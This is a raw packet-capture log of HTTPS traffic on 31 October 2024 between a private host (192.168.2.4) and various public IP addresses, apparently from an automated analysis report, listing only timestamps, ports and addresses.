Oct 31, 2024 19:19:33.666385889 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.666419029 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.666474104 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.666482925 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.666584969 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.666613102 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.666626930 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.666645050 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.666676998 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.666776896 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.666838884 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.666866064 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.667018890 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.667026997 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.667098045 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.667699099 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.667753935 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.667860031 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.667876005 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.668045044 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.668073893 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.668133020 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.668149948 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.668220997 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.668227911 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.669172049 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.669260025 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.669266939 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.673187017 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.673280954 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.673295021 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.678467989 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.678536892 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.678565025 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.681058884 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.681117058 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.681134939 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.684273005 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.684828043 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.684839010 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.688195944 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.690304041 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.690347910 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.690359116 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.690378904 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.690530062 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.693260908 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.693937063 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.693945885 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.696981907 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.697112083 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.697129011 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.698714018 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.698750973 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.698765039 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.701843023 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.701920033 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.701930046 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.704698086 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.704798937 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.704806089 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.707633972 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.707705975 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.707715988 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.710148096 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.710232019 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.710253954 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.713115931 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.713156939 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.713165998 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.713188887 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.713227034 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.717113018 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.719850063 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.719890118 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.719929934 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.719943047 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.720016003 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.721497059 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.725214958 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.725234032 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.725308895 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.725323915 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.725411892 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.726383924 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.728605032 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.728631020 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.728677988 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.728688955 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.728925943 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.731234074 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.733617067 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.733640909 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.733685970 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.733696938 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.733887911 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.736514091 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.739370108 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.739432096 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.739494085 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.739505053 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.739650965 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.741688967 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.743695021 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.743741035 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.743801117 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.743810892 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.743850946 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.745887995 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.748670101 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.748730898 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.748742104 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.769308090 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.769337893 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.769362926 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.769385099 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.769478083 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.769678116 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.769726992 CET	443	49835	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.769835949 CET	49835	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.849091053 CET	443	49838	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.865087032 CET	443	49856	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:33.891379118 CET	49838	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.891405106 CET	443	49838	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.891710997 CET	49856	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:33.891726971 CET	443	49856	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:33.891968966 CET	443	49838	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.892507076 CET	443	49856	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:33.892569065 CET	49856	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:33.894176960 CET	443	49856	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:33.894270897 CET	49856	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:33.896194935 CET	49838	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.896322012 CET	443	49838	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.899053097 CET	49856	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:33.899146080 CET	443	49856	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:33.899485111 CET	49838	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:33.899653912 CET	49856	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:33.899663925 CET	443	49856	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:33.947371006 CET	443	49838	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:33.972701073 CET	443	49839	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.037296057 CET	49856	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:34.037321091 CET	49839	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.039645910 CET	49839	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.039654970 CET	443	49839	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.043271065 CET	443	49839	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.043303967 CET	443	49839	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.043344021 CET	49839	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.045515060 CET	49839	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.045691967 CET	443	49839	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.050842047 CET	443	49870	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:34.054965973 CET	49839	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.054980993 CET	443	49839	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.056092978 CET	49870	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:34.056101084 CET	443	49870	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:34.057199001 CET	443	49870	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:34.057252884 CET	49870	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:34.058059931 CET	443	49846	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.067696095 CET	443	49854	107.21.226.44	192.168.2.4
Oct 31, 2024 19:19:34.078380108 CET	443	49860	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:34.078985929 CET	443	49845	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.082382917 CET	443	49858	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.089802980 CET	49870	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:34.089870930 CET	443	49870	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:34.090641975 CET	49846	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.090650082 CET	443	49846	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.091032982 CET	443	49846	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.091104984 CET	49846	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.091176987 CET	49854	443	192.168.2.4	107.21.226.44
Oct 31, 2024 19:19:34.091254950 CET	443	49854	107.21.226.44	192.168.2.4
Oct 31, 2024 19:19:34.091275930 CET	49845	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.091289043 CET	443	49845	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.091367960 CET	49860	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:34.091377020 CET	443	49860	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:34.091460943 CET	49858	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.091480970 CET	443	49858	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.091700077 CET	443	49845	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.091753006 CET	443	49846	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.091794014 CET	49846	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.092113972 CET	49846	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.092183113 CET	443	49846	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.092427015 CET	49870	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:34.092437029 CET	443	49870	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:34.092519999 CET	443	49854	107.21.226.44	192.168.2.4
Oct 31, 2024 19:19:34.092576981 CET	49854	443	192.168.2.4	107.21.226.44
Oct 31, 2024 19:19:34.092602015 CET	443	49860	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:34.092639923 CET	443	49858	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.092686892 CET	49858	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.092694044 CET	49860	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:34.092967987 CET	49845	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.093045950 CET	443	49845	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.094750881 CET	49854	443	192.168.2.4	107.21.226.44
Oct 31, 2024 19:19:34.094820976 CET	443	49854	107.21.226.44	192.168.2.4
Oct 31, 2024 19:19:34.094871044 CET	49858	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.094948053 CET	443	49858	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.095288038 CET	49860	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:34.095356941 CET	443	49860	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:34.095362902 CET	49846	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.095371008 CET	443	49846	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.095557928 CET	49845	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.095846891 CET	49854	443	192.168.2.4	107.21.226.44
Oct 31, 2024 19:19:34.095863104 CET	443	49854	107.21.226.44	192.168.2.4
Oct 31, 2024 19:19:34.095928907 CET	49858	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.095942974 CET	443	49858	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.095992088 CET	49860	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:34.096009016 CET	443	49860	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:34.120522976 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.120775938 CET	49853	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.120794058 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.121161938 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.121216059 CET	49853	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.121855021 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.121901989 CET	49853	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.124629021 CET	49853	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.124691963 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.125094891 CET	49853	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.125102997 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.125685930 CET	443	49857	185.98.54.153	192.168.2.4
Oct 31, 2024 19:19:34.130656004 CET	443	49859	208.93.169.131	192.168.2.4
Oct 31, 2024 19:19:34.139333010 CET	443	49845	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.145549059 CET	49839	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.145894051 CET	49846	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.150978088 CET	443	49856	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:34.152910948 CET	443	49856	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:34.153040886 CET	49856	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:34.153101921 CET	49870	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:34.153139114 CET	49854	443	192.168.2.4	107.21.226.44
Oct 31, 2024 19:19:34.153182030 CET	49860	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:34.153280973 CET	49858	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.165245056 CET	443	49838	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.172498941 CET	49857	443	192.168.2.4	185.98.54.153
Oct 31, 2024 19:19:34.172518969 CET	443	49857	185.98.54.153	192.168.2.4
Oct 31, 2024 19:19:34.173557997 CET	49859	443	192.168.2.4	208.93.169.131
Oct 31, 2024 19:19:34.173579931 CET	443	49859	208.93.169.131	192.168.2.4
Oct 31, 2024 19:19:34.173815966 CET	443	49857	185.98.54.153	192.168.2.4
Oct 31, 2024 19:19:34.173878908 CET	49857	443	192.168.2.4	185.98.54.153
Oct 31, 2024 19:19:34.175246000 CET	443	49859	208.93.169.131	192.168.2.4
Oct 31, 2024 19:19:34.175302029 CET	49859	443	192.168.2.4	208.93.169.131
Oct 31, 2024 19:19:34.191860914 CET	443	49869	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:34.200336933 CET	443	49864	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.215327024 CET	49869	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:34.215339899 CET	443	49869	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:34.216456890 CET	49864	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.216464043 CET	443	49864	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.217016935 CET	443	49869	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:34.217092037 CET	49869	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:34.217581034 CET	443	49864	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.217638016 CET	49864	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.218895912 CET	49864	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.218955040 CET	443	49864	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.223865032 CET	49859	443	192.168.2.4	208.93.169.131
Oct 31, 2024 19:19:34.224013090 CET	49864	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.224019051 CET	443	49864	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.224044085 CET	443	49859	208.93.169.131	192.168.2.4
Oct 31, 2024 19:19:34.226507902 CET	49857	443	192.168.2.4	185.98.54.153
Oct 31, 2024 19:19:34.226636887 CET	443	49857	185.98.54.153	192.168.2.4
Oct 31, 2024 19:19:34.227375984 CET	49859	443	192.168.2.4	208.93.169.131
Oct 31, 2024 19:19:34.227400064 CET	443	49859	208.93.169.131	192.168.2.4
Oct 31, 2024 19:19:34.229160070 CET	49857	443	192.168.2.4	185.98.54.153
Oct 31, 2024 19:19:34.229171038 CET	443	49857	185.98.54.153	192.168.2.4
Oct 31, 2024 19:19:34.232969999 CET	49869	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:34.233067989 CET	443	49869	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:34.233472109 CET	49869	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:34.233486891 CET	443	49869	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:34.253943920 CET	49838	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.253953934 CET	443	49838	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.254688025 CET	49838	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.254750013 CET	443	49838	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.254832983 CET	49838	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.270262957 CET	443	49854	107.21.226.44	192.168.2.4
Oct 31, 2024 19:19:34.270396948 CET	443	49854	107.21.226.44	192.168.2.4
Oct 31, 2024 19:19:34.271720886 CET	49854	443	192.168.2.4	107.21.226.44
Oct 31, 2024 19:19:34.273062944 CET	443	49870	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:34.273367882 CET	443	49870	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:34.273421049 CET	49870	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:34.275470018 CET	443	49858	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.275543928 CET	443	49858	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.275939941 CET	49858	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.317948103 CET	443	49839	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.318962097 CET	49876	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.318988085 CET	443	49876	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.319055080 CET	49876	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.320234060 CET	49877	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.320266008 CET	443	49877	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.320321083 CET	49877	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.320461035 CET	49876	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.320471048 CET	443	49876	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.321398973 CET	49877	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.321412086 CET	443	49877	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.321599007 CET	49854	443	192.168.2.4	107.21.226.44
Oct 31, 2024 19:19:34.321630001 CET	443	49854	107.21.226.44	192.168.2.4
Oct 31, 2024 19:19:34.321892023 CET	49870	443	192.168.2.4	8.2.111.136
Oct 31, 2024 19:19:34.321903944 CET	443	49870	8.2.111.136	192.168.2.4
Oct 31, 2024 19:19:34.323800087 CET	49858	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.323800087 CET	49858	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.323822021 CET	443	49858	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.323879957 CET	49858	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.328294992 CET	49856	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:34.328305960 CET	443	49856	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:34.328819990 CET	49839	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.328860998 CET	443	49839	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:34.328913927 CET	49839	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:34.331332922 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.332396030 CET	49853	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.344590902 CET	49864	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.355015039 CET	49859	443	192.168.2.4	208.93.169.131
Oct 31, 2024 19:19:34.355035067 CET	49857	443	192.168.2.4	185.98.54.153
Oct 31, 2024 19:19:34.355055094 CET	49869	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:34.362869024 CET	443	49855	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:34.370320082 CET	49855	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:34.370340109 CET	443	49855	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:34.370347023 CET	443	49846	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.371442080 CET	443	49855	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:34.371496916 CET	49855	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:34.372798920 CET	443	49845	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.380388975 CET	49855	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:34.380440950 CET	443	49855	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:34.380541086 CET	49855	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:34.386545897 CET	443	49864	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.386605978 CET	443	49864	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.386792898 CET	49864	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.390485048 CET	443	49869	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:34.390557051 CET	49869	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:34.390566111 CET	443	49869	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:34.390660048 CET	443	49869	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:34.390701056 CET	49869	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:34.402602911 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.402656078 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.402695894 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.402700901 CET	49853	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.402719975 CET	443	49853	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:34.402741909 CET	49853	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:34.427325010 CET	443	49855	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:34.437053919 CET	49882	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:34.437078953 CET	443	49882	54.88.211.52	192.168.2.4
Oct 31, 2024 19:19:34.437243938 CET	49882	443	192.168.2.4	54.88.211.52
Oct 31, 2024 19:19:34.437391043 CET	49883	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.437427044 CET	443	49883	174.137.133.49	192.168.2.4
Oct 31, 2024 19:19:34.437501907 CET	49883	443	192.168.2.4	174.137.133.49
Oct 31, 2024 19:19:34.438767910 CET	49884	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:34.438785076 CET	443	49884	20.157.217.118	192.168.2.4
